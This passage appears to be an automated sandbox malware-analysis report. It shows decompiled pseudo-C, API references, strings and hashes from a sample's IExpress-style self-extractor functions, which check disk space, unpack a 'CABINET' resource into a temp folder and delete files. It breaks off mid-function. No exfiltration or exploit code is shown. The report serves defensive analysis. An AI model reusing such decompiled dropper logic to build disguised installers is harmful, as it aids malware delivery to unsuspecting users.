API String ID: 383838535-2280873615
Opcode ID: c5cde542d379b8b3dcabaeaf6ab9f809cbf586cc6fbce848f7e7d0055dd29b84
Instruction ID: 1854ec0ea07248ced4697d7887c5e08e33d5be07c387e2280b7d80fdedc59c7f
Opcode Fuzzy Hash: c5cde542d379b8b3dcabaeaf6ab9f809cbf586cc6fbce848f7e7d0055dd29b84
Instruction Fuzzy Hash: 02A15870A002186BEB209B24CC44FEA3769AF55314F1442BBF955B72E1DBBC9D86CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0040597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x408004; // 0x7980a54a
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x409124 = E00406285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E004044B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x409a34 & 0x00000008;
							if(( *0x409a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x409a38; // 0x0
								_t110 =  *((intOrPtr*)(0x4089e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x409124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0040268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x409a38; // 0x0
							_t110 =  *((intOrPtr*)(0x4089e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x4089e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x409a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E004044B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x409124 = E00406285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E004044B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x409124 = E00406285();
					_t66 = 0;
					L33:
					return E00406CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x0040597d
0x00405988
0x0040598f
0x0040599a
0x004059a6
0x004059a8
0x004059af
0x004059b9
0x004059dd
0x004059e4
0x004059f1
0x004059fe
0x00405a0b
0x00405a13
0x00405a19
0x00405a1b
0x00405ba1
0x00405baf
0x00405bbd
0x00405bd8
0x00405bde
0x00405be3
0x00405bec
0x00405bf0
0x00405bfc
0x00405c02
0x00405c02
0x00405c02
0x00405c04
0x00405c04
0x00000000
0x00405c04
0x00405a27
0x00405a3a
0x00405a46
0x00405a48
0x00405a4a
0x00000000
0x00000000
0x00405a64
0x00405a6a
0x00405a6c
0x00405abc
0x00405ac2
0x00405ac9
0x00405aca
0x00405aca
0x00405acc
0x00405acc
0x00405acf
0x00405ad1
0x00000000
0x00000000
0x00405ad3
0x00405ad6
0x00405ad8
0x00000000
0x00000000
0x00405ada
0x00405adc
0x00405add
0x00405add
0x00405ae0
0x00000000
0x00000000
0x00000000
0x00405ae0
0x00405ae2
0x00405ae4
0x00405ae6
0x00405ae6
0x00405ae6
0x00405ae9
0x00405aeb
0x00405af0
0x00405af6
0x00405af8
0x00405af9
0x00405af9
0x00405afb
0x00000000
0x00000000
0x00405afd
0x00405aff
0x00405b00
0x00405b03
0x00000000
0x00000000
0x00000000
0x00405b03
0x00405b05
0x00405b08
0x00405b20
0x00405b27
0x00405b52
0x00405b52
0x00405b5b
0x00405b62
0x00405b6b
0x00405b6d
0x00405b76
0x00405b7d
0x00405b83
0x00405b7f
0x00405b7f
0x00405b7f
0x00405b6f
0x00405b72
0x00405b72
0x00405b85
0x00405b98
0x00405b9e
0x00405b87
0x00405b8f
0x00405b8f
0x00000000
0x00405b85
0x00405b29
0x00405b33
0x00000000
0x00000000
0x00405b35
0x00405b48
0x00405b4a
0x00000000
0x00405b4a
0x00405b0f
0x00405b16
0x00000000
0x00405b16
0x00405a7c
0x00405a8a
0x00405aa5
0x00405aab
0x00000000
0x004059bb
0x004059c0
0x004059c7
0x004059d1
0x004059d6
0x00405c05
0x00405c14
0x00405c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 004059A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 004059AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00405A13
MulDiv.KERNEL32(?,?,00000400), ref: 00405A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00405A64
memset.MSVCRT ref: 00405A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00405A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00405AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00405BFC

Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554

Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: 6aaf8c91b5dca31200441e902ea9edd8fd2e2a5f7089ede1390eec398b18bba2
Instruction ID: 43d5c1b8738d8d9cee642188910e7ae7015c6787622b6f388fd3a53d4582656a
Opcode Fuzzy Hash: 6aaf8c91b5dca31200441e902ea9edd8fd2e2a5f7089ede1390eec398b18bba2
Instruction Fuzzy Hash: E67195B1A0020CAFEB159F60CD85BFB77BCEB48304F0440BAF545B6281D6389E458F69

Uniqueness

Uniqueness Score: -1.00%

Function 00404FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00404FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x409144 = E0040468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x409140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x408584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x408584, 0x841), 5);
				}
				_t10 = E00404EFD(0, 0);
				if(_t10 != 0) {
					__imp__#20(E00404CA0, E00404CC0, E00404980, E00404A50, E00404AD0, E00404B60, E00404BC0, 1, 0x409148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x409148; // 0x0
						_t24 =  *0x408584; // 0x0
						E004044B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x401140, 0, E00404CD0, 0, 0x409140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x408584; // 0x0
					E004044B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x409140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x409140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x4091d8; // 0x0
						if(_t47 == 0) {
							E004044B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x408a38 & 0x00000001) == 0 && ( *0x409a34 & 0x00000001) == 0) {
						SendMessageA( *0x408584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x00404fe0
0x00404fe6
0x00404ff9
0x0040500d
0x00405013
0x0040501a
0x00405163
0x00405163
0x00405020
0x00405027
0x00405037
0x00405051
0x00405051
0x00405057
0x0040505e
0x004050a7
0x004050ad
0x004050b4
0x004050e8
0x004050e8
0x004050ee
0x004050ff
0x00405104
0x00405106
0x00000000
0x00405106
0x004050cd
0x004050d3
0x004050da
0x00000000
0x00000000
0x004050dd
0x004050e6
0x00000000
0x00000000
0x00000000
0x00405060
0x00405060
0x00405070
0x00405075
0x00405107
0x00405107
0x0040510e
0x00405111
0x00405117
0x00405117
0x0040511f
0x00405121
0x00405127
0x00405135
0x00405135
0x00405127
0x00405141
0x00405159
0x00405159
0x00000000
0x0040515f

APIs

Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00404FFE
LoadResource.KERNEL32(00000000,00000000), ref: 00405006
LockResource.KERNEL32(00000000), ref: 0040500D
GetDlgItem.USER32(00000000,00000842), ref: 00405030
ShowWindow.USER32(00000000), ref: 00405037
GetDlgItem.USER32(00000841,00000005), ref: 0040504A
ShowWindow.USER32(00000000), ref: 00405051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00405111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00405159

Strings

CABINET, xrefs: 00404FE6, 00404FF7
*MEMCAB, xrefs: 004050C7

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: 09a44ef4b14b10cb8208e50229d1ed21c6988b88aa67c305168c5717d0b677ef
Instruction ID: c7e9636301b6909bf0cfcc4fade7c16197fcaa171c04f7cf8e0346fe02231bd7
Opcode Fuzzy Hash: 09a44ef4b14b10cb8208e50229d1ed21c6988b88aa67c305168c5717d0b677ef
Instruction Fuzzy Hash: 6F31C9F0B40706BBE7105F61AF89F67365CE748755F14403AFA41BA2E2DABC9C108A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00402F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00402F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x408004; // 0x7980a54a
				_v8 = _t9 ^ _t46;
				if( *0x408a38 != 0) {
					L5:
					_t11 = E00405164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00406CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E004055A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0040658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x40a288("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x408a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x408a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x408d48 & 0x000000c0;
									if(( *0x408d48 & 0x000000c0) == 0) {
										_t41 =  *0x409a40; // 0x3, executed
										_t26 = E0040256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x408a24; // 0x0
									 *0x409a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x408a38;
										if( *0x408a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00404169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x409a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00403BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x408a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00403B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E004044B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x409124 = E00406285();
							goto L16;
						}
						_t59 =  *0x409a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0040621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x408a24;
				if( *0x408a24 != 0) {
					L4:
					_t34 = E00403A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E004051E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x408a38;
				if( *0x408a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x00402f1d
0x00402f28
0x00402f2f
0x00402f3d
0x00402f6c
0x00402f6c
0x00402f71
0x00402f73
0x00403041
0x00403041
0x00403043
0x00403053
0x00403053
0x00402f79
0x00402f80
0x00000000
0x00402f86
0x00402f86
0x00402f93
0x00402f9e
0x00402fa0
0x00402fa6
0x00402fb8
0x00402fba
0x00402fbe
0x00402fc6
0x00402fcc
0x00402fd4
0x00402fd6
0x00402fd8
0x00402fe0
0x00402fe6
0x00402fee
0x00402ff0
0x00402ff5
0x00402ff5
0x00402fee
0x00402fd4
0x00402ff8
0x00402ffe
0x00403004
0x00403017
0x0040301c
0x00403024
0x00403054
0x0040305a
0x00403065
0x00403065
0x0040306c
0x0040306e
0x00403075
0x0040307a
0x0040307a
0x0040307c
0x00403081
0x00403087
0x00403089
0x004030a1
0x004030a1
0x004030a9
0x004030ab
0x004030ad
0x004030af
0x004030af
0x004030ad
0x004030b6
0x00000000
0x0040308b
0x0040308b
0x00403091
0x00000000
0x00000000
0x00403093
0x00403098
0x0040309a
0x00000000
0x00000000
0x0040309c
0x00000000
0x0040309c
0x00403089
0x0040305c
0x00403061
0x00403063
0x00000000
0x00000000
0x00000000
0x00403063
0x0040302b
0x00403032
0x0040303c
0x00000000
0x0040303c
0x00403006
0x0040300c
0x00000000
0x00000000
0x0040300e
0x00403015
0x00000000
0x00000000
0x00000000
0x00403015
0x00402f80
0x00402f3f
0x00402f46
0x00402f5f
0x00402f5f
0x00402f64
0x00402f66
0x00000000
0x00000000
0x00000000
0x00402f66
0x00402f4f
0x00000000
0x00000000
0x00402f55
0x00402f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32(?,00000105), ref: 00402F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00402FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00402FC6
DecryptFileA.ADVAPI32 ref: 00402FE6
FreeLibrary.KERNEL32(00000000), ref: 00402FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0040301C

Part of subcall function 004051E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00402F4D,?,00000002,00000000), ref: 00405201

Strings

advapi32.dll, xrefs: 00402F99
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00402FDB, 00403017
DecryptFileA, xrefs: 00402FC0

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-1173327654
Opcode ID: 06cd3a77e258f2f6014872c6370331c5e6c0375f7d7b6bb2db4781a8fc7ad934
Instruction ID: dd7a2d248aebac99f1714a49481474325bfd39d927ddb191d2ee86f43da6afaf
Opcode Fuzzy Hash: 06cd3a77e258f2f6014872c6370331c5e6c0375f7d7b6bb2db4781a8fc7ad934
Instruction Fuzzy Hash: 9641A270B012059BDB20AF769E4965B3BAC9B44755F10007FA941F26D6EB7C8E80CE6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00405467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x408004; // 0x7980a54a
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x4091e4;
					_t42 = 0x104;
					E00401680(0x4091e4, 0x104);
					L14:
					_t13 = E004058C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x409124 = 0;
							_t14 = 1;
							L24:
							return E00406CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E0040597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x408a20; // 0x0
						if(_t61 != 0) {
							 *0x408a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x409124 = E00406285();
						goto L22;
					}
					 *0x408a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E004053A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x4091e4;
				E00401781(0x4091e4, 0x104, __ecx,  &_v268);
				if(( *0x409a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E0040658A(_t48, 0x104, 0x401140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E0040658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x00405472
0x00405479
0x00405481
0x00405484
0x0040551c
0x00405521
0x00405528
0x0040552d
0x0040552f
0x00405539
0x0040554d
0x0040554d
0x00405552
0x00405585
0x00405585
0x0040558b
0x0040558d
0x0040559d
0x0040559d
0x00405557
0x0040555e
0x00000000
0x00000000
0x00405560
0x00405566
0x00405569
0x0040556f
0x0040556f
0x00405581
0x00405581
0x00000000
0x00405581
0x00405545
0x0040557c
0x00000000
0x0040557c
0x00405547
0x00000000
0x00405547
0x0040548a
0x00405490
0x00405497
0x00000000
0x00000000
0x0040549d
0x004054ab
0x004054b4
0x004054c0
0x0040550c
0x00405511
0x00405515
0x00000000
0x00405515
0x004054c9
0x004054d6
0x004054d8
0x004054fe
0x00405503
0x00405507
0x00000000
0x00405507
0x004054da
0x004054dd
0x004054f7
0x00000000
0x004054f7
0x004054df
0x004054e2
0x004054f0
0x00000000
0x004054f0
0x004054e7
0x00000000
0x00000000
0x004054e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004054C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040556F

Part of subcall function 004053A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004053FB
Part of subcall function 004053A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405402
Part of subcall function 004053A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040541F
Part of subcall function 004053A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040542B
Part of subcall function 004053A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405434

Strings

mips, xrefs: 004054F7
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 0040547D, 00405481, 004054AB, 0040551C, 0040553C, 00405568
i386, xrefs: 004054FE
alpha, xrefs: 004054F0
ppc, xrefs: 004054E9

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-3374052426
Opcode ID: 860b4abba6f2e9196ec0708b34676737e603b7f2e39ec8806f8bda2caedf095c
Instruction ID: 42d8508e497298c23007889095531b712f90f8dafbad6872354eea9b701dc3d5
Opcode Fuzzy Hash: 860b4abba6f2e9196ec0708b34676737e603b7f2e39ec8806f8bda2caedf095c
Instruction Fuzzy Hash: EA313A70700A047BDB105F2A9D04A7F77AAEB81304B14013FAC02F26E5DB7C8E028E8D

Uniqueness

Uniqueness Score: -1.00%

Function 00402390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00402390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x408004; // 0x7980a54a
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00406CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00401680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E004016B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00401680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E004016B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
